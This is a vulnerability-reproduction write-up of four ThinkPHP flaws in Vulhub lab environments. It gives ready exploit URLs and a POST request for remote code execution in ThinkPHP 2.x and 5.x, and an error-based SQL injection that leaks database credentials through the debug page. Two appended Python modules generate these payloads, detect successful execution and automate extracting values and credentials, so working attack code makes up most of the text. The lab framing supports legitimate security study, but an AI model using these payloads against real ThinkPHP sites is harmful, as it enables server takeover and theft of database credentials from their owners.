Vulhub vulnerability reproduction 68_ThinkPHP
2022-07-06 05:17:00 【Revenge_ scan】
1. ThinkPHP 2.x Arbitrary Code Execution Vulnerability
Vulnerability Details
In ThinkPHP 2.x, routes are matched with `preg_replace` in `/e` mode:
```php
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
```
The `/e` modifier evaluates the replacement string as PHP code, so the user-controlled route value is inserted inside a double-quoted PHP string and then executed. A value such as `${@phpinfo()}` is interpolated by PHP as an expression, which gives arbitrary code execution.
ThinkPHP 3.0 is also affected, because the bug was not fixed in Lite mode.
Environment Setup
Target: 192.168.4.10 (Ubuntu)
Run the following command to start the ThinkPHP 2.1 demo application:
#docker-compose up -d
After the environment starts, visit `http://your-ip:8080/` to see the default page.
Vulnerability Reproduction
Directly access `http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D` (that is, `${@phpinfo()}` URL-encoded) to execute `phpinfo()`.
2. ThinkPHP5 5.0.23 Remote Code Execution Vulnerability
Vulnerability Details
ThinkPHP is a widely used PHP development framework. In versions before 5.0.23, the method that obtains the request method does not handle the method name correctly, which lets an attacker call any method of the Request class and build an exploitation chain, leading to remote code execution.
Reference link:
- https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
Vulnerability Environment
Run the following command to start a default ThinkPHP 5.0.23 environment:
#docker-compose up -d
After the environment starts, visit `http://your-ip:8080` to see the default ThinkPHP start page.
Vulnerability Reproduction
Send the following request:
```
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
```
The `id` command is executed successfully.
3. ThinkPHP5 5.0.22/5.1.29 Remote Code Execution Vulnerability
Vulnerability Details
ThinkPHP is a widely used PHP development framework. In version 5, the controller name is not handled correctly, so when forced routing is not enabled (the default) arbitrary methods can be executed, which leads to remote code execution.
Reference links:
- http://www.thinkphp.cn/topic/60400.html
- http://www.thinkphp.cn/topic/60390.html
- https://xz.aliyun.com/t/3570
Vulnerability Environment
Run ThinkPHP 5.0.20:
#docker-compose up -d
After the environment starts, visit `http://your-ip:8080` to see the default ThinkPHP start page.
Vulnerability Reproduction
Directly access `http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1` to execute `phpinfo()`.
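The following Python helper is an added example, not code from the Vulhub page or the ThinkPHP project. It serves the three reproductions above (sections 1 to 3): it reconstructs the PHP statements the `/e` modifier evaluates for a 2.x route, builds the `_method=__construct` POST body used against 5.0.23 and the `invokefunction` URL used against 5.0.x/5.1.x, and judges from a response body whether `phpinfo()` or `id` ran. `TARGET`, the `fetch()` helper and the success markers are assumptions, not part of the page; `your-ip:8080` is the lab address used above.

```python
"""Added example, not code from the Vulhub page or the ThinkPHP project:
builds the three RCE payloads reproduced above and judges from the response
body whether they executed.  TARGET is a placeholder for http://your-ip:8080."""
import re
import urllib.parse
import urllib.request

TARGET = "http://your-ip:8080"  # assumption: the docker-compose target used on the page

# --- 1. ThinkPHP 2.x: preg_replace('@(\w+)/([^/\/]+)@e', '$var[\'\\1\']="\\2";', ...)
# The /e modifier eval()s the replacement, so every "name/value" pair in the
# remaining route (the part left after module and action; assumed here) becomes
# a PHP statement with the value inside double quotes, where PHP interpolates
# ${...} as an expression.
TP2_PAIR = re.compile(r"(\w+)/([^/]+)")

def tp2_eval_statements(route_params: str) -> list:
    """PHP statements that /e would evaluate for e.g. 'name/${@phpinfo()}'."""
    return [f"$var['{k}']=\"{v}\";" for k, v in TP2_PAIR.findall(route_params)]

def tp2_url(base: str, php_expr: str) -> str:
    """index.php?s=/index/index/name/${@<expr>} with the braces percent-encoded."""
    payload = urllib.parse.quote("${@" + php_expr + "}", safe="$@()")
    return f"{base}/index.php?s=/index/index/name/{payload}"

# --- 2. ThinkPHP 5.0.23: _method=__construct makes Request::method() call
# $this->__construct($_POST), which overwrites the properties filter, method
# and server.  param() later calls method(true), which reads
# server('REQUEST_METHOD') and passes it through the filter: system('id').
def tp5_method_body(cmd: str) -> str:
    params = {
        "_method": "__construct",
        "filter[]": "system",
        "method": "get",
        "server[REQUEST_METHOD]": cmd,
    }
    return urllib.parse.urlencode(params, safe="[]")  # keep [] readable, as on the page

# --- 3. ThinkPHP 5.0.x/5.1.x without forced routing: the controller segment is
# not validated, so the fully qualified class \think\App is reached and its
# invokeFunction() ends up doing call_user_func_array(func, [arg]).
def tp5_invokefunction_url(base: str, func: str, arg: str) -> str:
    q = urllib.parse.quote
    return (f"{base}/index.php?s=/Index/\\think\\app/invokefunction"
            f"&function=call_user_func_array&vars[0]={q(func)}&vars[1][]={q(arg)}")

# --- success markers in the response body (assumed heuristics)
ID_OUTPUT = re.compile(r"uid=\d+\([^)]+\)\s+gid=\d+")

def executed(body: str):
    """'phpinfo', 'id', or None depending on what the body shows."""
    if "<title>phpinfo()</title>" in body:
        return "phpinfo"
    if ID_OUTPUT.search(body):
        return "id"
    return None

def fetch(url: str, data: str = None, timeout: int = 10) -> str:
    """Plain HTTP round trip; data (if given) is sent as a form POST."""
    req = urllib.request.Request(
        url, data=data.encode() if data else None,
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")

if __name__ == "__main__":
    print(tp2_eval_statements("name/${@phpinfo()}"))
    print(tp2_url(TARGET, "phpinfo()"))
    print(tp5_method_body("id"))
    print(tp5_invokefunction_url(TARGET, "phpinfo", "-1"))
    # against a live lab: executed(fetch(TARGET + "/index.php?s=captcha", tp5_method_body("id")))
```

`tp5_method_body("id")` reproduces the 72-byte body from the request above byte for byte; commands with spaces or slashes are form-encoded and decoded again by PHP before `system()` sees them.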
4. ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure
Environment
#docker-compose up -d
After the environment starts, visit `http://your-ip/index.php?ids[]=1&ids[]=2`. If user names are displayed, the environment is running correctly.
Vulnerability Principle
Analyses of the vulnerability:
- https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
- https://xz.aliyun.com/t/125
Exploitation
Visit `http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`; the information is leaked successfully (error-based injection through the array key of `ids`).
Admittedly, this SQL injection is of limited use on its own. But through the DEBUG page we also find the database account and password.
This is a second vulnerability: sensitive information disclosure.
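The Python below is an added example, not code from the Vulhub page or ThinkPHP. It serves both the exploitation step and the debug-page leak above: it builds the error-based injection URL for the `ids[]` key, pulls the leaked value out of the MySQL XPATH error that the debug page echoes (reassembling values longer than updatexml's 32-character limit from several probes), and scrapes the database credentials from the same page. The debug page it parses is constructed from the shape of ThinkPHP's error page, the config-dump format is an assumption, and `fake_fetch()` stands in for a real HTTP GET so the module runs offline.

```python
"""Added example, not part of the Vulhub page or ThinkPHP: builds error-based
injection URLs for the ids[] vector, extracts the leaked value from the MySQL
XPATH error on the debug page and scrapes the database credentials from it.
SAMPLE_DEBUG_PAGE is constructed, not captured from a real target."""
import html
import re
from urllib.parse import quote

# updatexml() quotes at most 32 characters of the offending XPath in its error
# message, so a leading 0xa (newline) plus a 31-character substr() window is used.
WINDOW = 31

def updatexml_probe(expr: str, start: int = 1, length: int = WINDOW) -> str:
    """SQL that errors out with one window of expr inside the message."""
    return f"updatexml(0,concat(0xa,substr(({expr}),{start},{length})),0)"

def injection_url(base: str, sql: str) -> str:
    """The array *key* of ids[] is what reaches the query, hence ids[0,<sql>]=1."""
    return f"{base}/index.php?ids[{quote('0,' + sql, safe='(),@')}]=1"

XPATH_ERR = re.compile(r"XPATH syntax error: '\n?(.*?)'", re.S)

def extract_leak(page: str):
    """Value MySQL quoted in the XPATH error, or None if no error was shown."""
    m = XPATH_ERR.search(html.unescape(page))
    return m.group(1) if m else None

# Assumed dump format: 'key' => 'value' lines as printed on the debug page.
CONFIG_ITEM = re.compile(r"'(hostname|database|username|password)'\s*=>\s*'([^']*)'")

def extract_db_credentials(page: str) -> dict:
    """Database config items dumped on the debug page."""
    return dict(CONFIG_ITEM.findall(html.unescape(page)))

def leak(base: str, expr: str, fetch, length: int = WINDOW) -> str:
    """Reassemble a value longer than one window from successive probes.
    fetch(url) -> page body; stops on a NULL result or an empty window."""
    out, start = "", 1
    while True:
        page = fetch(injection_url(base, updatexml_probe(expr, start, length)))
        piece = extract_leak(page)
        if not piece:
            return out
        out += piece
        if len(piece) < length:
            return out
        start += length

# Constructed debug page standing in for what the target returns.
SAMPLE_DEBUG_PAGE = """<!DOCTYPE html><html><head><title>System error</title></head><body>
<h1>XPATH syntax error: &#039;
root@localhost&#039;</h1>
<div class="exception-var"><pre>
array (
  'type' =&gt; 'mysql',
  'hostname' =&gt; 'mysql',
  'database' =&gt; 'test',
  'username' =&gt; 'root',
  'password' =&gt; 'example',
)
</pre></div></body></html>"""

def fake_fetch(value: str):
    """Offline stand-in for an HTTP GET: answers each probe with the page MySQL
    would have produced if expr evaluated to `value`."""
    def fetch(url: str) -> str:
        m = re.search(r"substr\(\(.*?\),(\d+),(\d+)\)", url)
        start, length = int(m.group(1)), int(m.group(2))
        window = value[start - 1:start - 1 + length]
        return f"<h1>XPATH syntax error: '\n{html.escape(window, quote=False)}'</h1>"
    return fetch

if __name__ == "__main__":
    print(injection_url("http://your-ip", "updatexml(0,concat(0xa,user()),0)"))
    print(extract_leak(SAMPLE_DEBUG_PAGE))
    print(extract_db_credentials(SAMPLE_DEBUG_PAGE))
    print(leak("http://your-ip", "@@version", fake_fetch("x" * 31 + "-long-tail")))
```

Against a live lab, pass a real `fetch` (for example one built on `urllib.request`) to `leak()`; the parser only relies on the debug page printing the raw MySQL error, which is exactly what makes the credential leak possible in the first place.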